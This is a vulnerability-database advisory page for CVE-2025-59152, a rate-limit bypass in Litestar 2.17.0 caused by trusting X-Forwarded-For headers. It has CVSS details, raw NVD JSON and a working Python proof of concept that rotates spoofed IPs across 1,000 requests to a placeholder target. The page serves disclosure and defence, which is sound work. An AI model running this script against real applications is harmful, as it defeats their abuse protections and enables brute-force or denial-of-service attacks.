Security Vulnerability Report
中文
CVE-2025-59152 CVSS 7.5 HIGH

CVE-2025-59152

Published: 2025-10-06 16:15:34
Last Modified: 2026-04-15 00:35:42
Source: [email protected]

Description

Litestar is an Asynchronous Server Gateway Interface (ASGI) framework. In version 2.17.0, rate limits can be completely bypassed by manipulating the X-Forwarded-For header. This renders IP-based rate limiting ineffective against determined attackers. Litestar's RateLimitMiddleware uses `cache_key_from_request()` to generate cache keys for rate limiting. When an X-Forwarded-For header is present, the middleware trusts it unconditionally and uses its value as part of the client identifier. Since clients can set arbitrary X-Forwarded-For values, each different spoofed IP creates a separate rate limit bucket. An attacker can rotate through different header values to avoid hitting any single bucket's limit. This affects any Litestar application using RateLimitMiddleware with default settings, which likely includes most applications that implement rate limiting. Version 2.18.0 contains a patch for the vulnerability.

CVSS Details

CVSS Score
7.5
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H

Configurations (Affected Products)

No configuration data available.

litestar == 2.17.0

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
#!/usr/bin/env python3 """ CVE-2025-59152 - Litestar RateLimitMiddleware Bypass PoC This PoC demonstrates how an attacker can bypass rate limiting by rotating X-Forwarded-For header values. """ import requests import random import time TARGET_URL = "http://target-litestar-app.com/api/endpoint" # Target Litestar application endpoint NUM_REQUESTS = 1000 # Number of requests to send (exceeding normal rate limit) def generate_random_ip(): """Generate a random IP address for X-Forwarded-For header spoofing.""" return f"{random.randint(1, 223)}.{random.randint(0, 255)}.{random.randint(0, 255)}.{random.randint(1, 254)}" def exploit_rate_limit_bypass(): """ Exploit the rate limit bypass vulnerability by rotating X-Forwarded-For header values for each request. """ print(f"[*] Starting rate limit bypass exploit against {TARGET_URL}") print(f"[*] Sending {NUM_REQUESTS} requests with rotating X-Forwarded-For headers") success_count = 0 blocked_count = 0 for i in range(NUM_REQUESTS): # Rotate X-Forwarded-For header with a random IP for each request spoofed_ip = generate_random_ip() headers = { "X-Forwarded-For": spoofed_ip, "User-Agent": "Mozilla/5.0 (compatible; PoC)" } try: response = requests.get(TARGET_URL, headers=headers, timeout=10) if response.status_code == 200: success_count += 1 if (i + 1) % 100 == 0: print(f"[+] Request {i+1}: Success (IP: {spoofed_ip}, Status: {response.status_code})") elif response.status_code == 429: # Too Many Requests blocked_count += 1 print(f"[-] Request {i+1}: Rate limited (IP: {spoofed_ip})") else: print(f"[?] Request {i+1}: Status {response.status_code} (IP: {spoofed_ip})") except requests.exceptions.RequestException as e: print(f"[!] Request {i+1}: Error - {e}") print(f"\n[*] Results:") print(f" Successful requests: {success_count}") print(f" Blocked requests: {blocked_count}") print(f" Bypass rate: {success_count/NUM_REQUESTS*100:.1f}%") if success_count > blocked_count: print("[!] VULNERABLE: Rate limiting has been bypassed!") else: print("[*] Rate limiting appears to be effective.") if __name__ == "__main__": exploit_rate_limit_bypass()

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-59152", "sourceIdentifier": "[email protected]", "published": "2025-10-06T16:15:34.193", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "Litestar is an Asynchronous Server Gateway Interface (ASGI) framework. In version 2.17.0, rate limits can be completely bypassed by manipulating the X-Forwarded-For header. This renders IP-based rate limiting ineffective against determined attackers. Litestar's RateLimitMiddleware uses `cache_key_from_request()` to generate cache keys for rate limiting. When an X-Forwarded-For header is present, the middleware trusts it unconditionally and uses its value as part of the client identifier. Since clients can set arbitrary X-Forwarded-For values, each different spoofed IP creates a separate rate limit bucket. An attacker can rotate through different header values to avoid hitting any single bucket's limit. This affects any Litestar application using RateLimitMiddleware with default settings, which likely includes most applications that implement rate limiting. Version 2.18.0 contains a patch for the vulnerability."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "baseScore": 7.5, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-807"}]}], "references": [{"url": "https://github.com/litestar-org/litestar/blob/26f20ac6c52de2b4bf81161f7560c8bb4af6f382/litestar/middleware/rate_limit.py#L127", "source": "[email protected]"}, {"url": "https://github.com/litestar-org/litestar/commit/42a89e043e50b515f8548a93954fe143f63cf9fb", "source": "[email protected]"}, {"url": "https://github.com/litestar-org/litestar/security/advisories/GHSA-hm36-ffrh-c77c", "source": "[email protected]"}]}}
Disclaimer

This information is for security research and authorized penetration testing only. Unauthorized testing of other systems is illegal.